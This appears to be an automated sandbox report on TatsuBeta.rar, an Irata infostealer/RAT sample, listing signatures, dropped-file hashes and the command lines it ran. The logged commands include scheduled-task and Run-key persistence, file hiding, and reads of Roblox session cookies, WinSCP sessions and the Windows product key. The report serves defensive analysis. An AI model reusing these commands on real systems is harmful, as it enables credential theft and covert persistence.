Malware Analysis Report

2025-01-19 06:21

Sample ID 231217-q3mdbagaa4
Target TatsuBeta.rar
SHA256 dbbe13e230bf1aafd6069a339fd939e22d272215bf934f763cb1cd3ebe780331
Tags
irata infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dbbe13e230bf1aafd6069a339fd939e22d272215bf934f763cb1cd3ebe780331

Threat Level: Known bad

The file TatsuBeta.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer persistence rat spyware stealer trojan

Irata

Irata payload

Executes dropped EXE

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops autorun.inf file

Unsigned PE

Enumerates physical storage devices

Collects information from the system

Views/modifies file attributes

Detects videocard installed

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Creates scheduled task(s)

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-17 13:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10-20231215-en

Max time kernel

9s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1396 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1828 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\MVb3MPJhfaLX9RxrJiQ8\System\cam.4932_Admin"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\MVb3MPJhfaLX9RxrJiQ8\System\cam.4932_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs /f"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3540 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network


Files

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\d3dcompiler_47.dll

MD5 47ae1c5ba5cd7260d633b31c09c1afd7
SHA1 69a007c2673b5af77d3ece4b771d4592b12b856d
SHA256 4940054c20bc1f9e2f279cb01808d2b70b21e6c449bb2a6acd5637dd445a8509
SHA512 6968935aa9f697bd2a2f06c915b3e792eae69a4de3963505986c9b5c7a3acf53b2aee25bc9ddb1e4469b54c272b29aa84c1e0ed748d0eb40b84cb95537ea2be9

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\ffmpeg.dll

MD5 df12826da5c11a8ec042d6fb4ca0155b
SHA1 cfbf71d518256d3d2d972dd46743a5192d5a2925
SHA256 e5fde93ae77e5eaa8e92abf944abc42cb13dc1b0667be36c304ffada8b568449
SHA512 d271338840261202aee4d7a23c30beeefe16cce6e34b661a80200773747ff61771f52b6a3833ea9f9f2e827444ac4f1bcfebea7630c8cee9b9206e50e442116a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\libGLESv2.dll

MD5 e9b62b43a258a36e13848f7220afd8e6
SHA1 a9405f2a6219901572badee6433bd088cceb1b98
SHA256 4015b320cddc658d218de69f9a97aae89ef5813287d383aab65cd4c7589c0694
SHA512 5c13674dd9a0ee37936c010c0f34a47200dbc316214d1ec20ebf690be6d6b3f2648a057a433faa2ba2744f1aa47cb65c34f7627f56a0e6b23b866056f9927c78

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\libEGL.dll

MD5 cf52f8f071804255685c1f26bbea7f54
SHA1 ccf889a841dfea638477a98363ab26602225c21f
SHA256 2b61c328d9424689a03cb61fcc4436f41a7d5005d7b5156356a2a884b8ad24fc
SHA512 f73d631d1b4ee0bd8c83fe3f28e8b81747b2642f3314954c1447926674d71890add54a04164d10bfeaa39073af182bf11b121e67ef99055fe5c47cdd0db39ed4

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\icudtl.dat

MD5 7128d70133016bd6717e8c83d052081f
SHA1 e40003d2de0bc075b3ed2ff3f489f80d93be2349
SHA256 093ba5c4086b98e74128c3bd7aa35b81b9bddb0d39d4b19c0c792fdb1a1755b6
SHA512 0baff56b96b9fe0b8b3ed889433c87316f54125204054d198398d942cf345c46e1ef9014c3ef68caae0b97c399d83267934f89ef106f1c0bc9997b52614f2707

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\LICENSES.chromium.html

MD5 96aad5afa9414183bac7b5ba0e887364
SHA1 d43f4b6b88c9effb4cd2f08f6ec39f1975f32163
SHA256 c57600efc84f89e1d63367a044b874b06e2516431bdc57bdc4d9c6d92f7ba354
SHA512 e01ddcd8453c33b9d7d9fa018a1033d1b6f98242fd39ac8ac2b116bf4a71d248a8bd92ed7d8c4f8c8c048be0ec476916940b81e92cc6ed6d084163d185797002

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources.pak

MD5 7b602b83d217b099dc7770ea129b532d
SHA1 b32a1fdeb5459cfaea880596a695b487bc3f6163
SHA256 f76bf091bfcb59b4b170ae442fd86c87dcee488230e25d5241b44f1404826b5c
SHA512 954ef440e2f90cdddc351892864337626a44a2d61589cd112546325973cf31261ddcd3f34f405ad727d78e40193b36922a7d0ba5fc4a3f60aa252cee37b2ae60

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\snapshot_blob.bin

MD5 753313d67a77bdd897a9b4c0ebb35d05
SHA1 e426d70e06bcfe76599db33d9d39f8315440d0b8
SHA256 71c4864f87347a89df851326cd65d8a087e121b6e8f1972418fb79248477d6a4
SHA512 736ed0e474cb2729c15e225d02ee588cbddfe1b7a40aa397170de05b1049d3c7930dd0de777c891dee22fcec3a81566c7beab5269ed414c4f9efc939412bc228

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\v8_context_snapshot.bin

MD5 358f6a0a5f15c1eef0c97107e6871fae
SHA1 274c18522dee318e65c9f99b7f9d9bd793eac2c9
SHA256 39b140fe03e089ce73794e94495fe57d86146991182eb31257db4a486de34fdd
SHA512 5e310fa19c2e7020ff9be94c39cb9061b3c47a412481cc48902a368781be64e674d6135856ad1df3f518b38e387ab973e90ceb89ae635ea5c1063220b90dcf3a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vk_swiftshader.dll

MD5 82287d8c9aafd1e1a6cd67ee902571d1
SHA1 3cd03bb9e0ba2dafdbd9f8afb100f106d3f5c205
SHA256 34bbfa7b10741926a64e1f738f51f5b44fadc03bd580f5ed4e893782599638fb
SHA512 4b1e46424d17b2134b2844a2b8b54672d73270130788ffc896a5a9c765ab3c2da78abd28583f29b1ebb6b73b8bcfad8e4a1f98e1b73b1a8a9fd90bf3f9ed367f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\TatsuBeta.exe

MD5 c29326dd42b6c3ea55411bd8d700d6bc
SHA1 edea90f75edcfd7d8bd306655596ca6ac53ade43
SHA256 bfae3c689d3b060219f58bbc5b3dbb13eaf1802623b90c232460996de3f41921
SHA512 298138e947fec9e1f9ee649c77d26bdf859c900c9d4400a6e98b2312c30a627799dc9828e767268d40430b1e601e2b7db12e8efc865bf8bd6c81f8a2cf41f506

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vulkan-1.dll

MD5 a19d9d147e1abe091baf9e543b082b1e
SHA1 cbe798b96834f10276b174fd0a72ff10c9722e36
SHA256 183a395557c59cb912e7ec3892d433fe883dde145fe2247fc50d5e4b96a5b5eb
SHA512 11c216a90bddd73097245fdd6fe36d597f0d1ef89cd717c2f2ae27d01735ca3fdf48289ec00e04c01e60f53d9238eac1fb385ff23d8cff18e7448a2f1cf98e42

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\el.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\de.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\cs.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\en-US.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\et.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\kn.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ja.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\it.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\id.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hu.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hr.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hi.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\he.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\gu.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ko.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fr.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fil.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\lt.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fi.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fa.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\es.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\es-419.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\lv.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pt-PT.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pt-BR.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pl.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\nl.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\nb.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ms.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\mr.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ml.pak

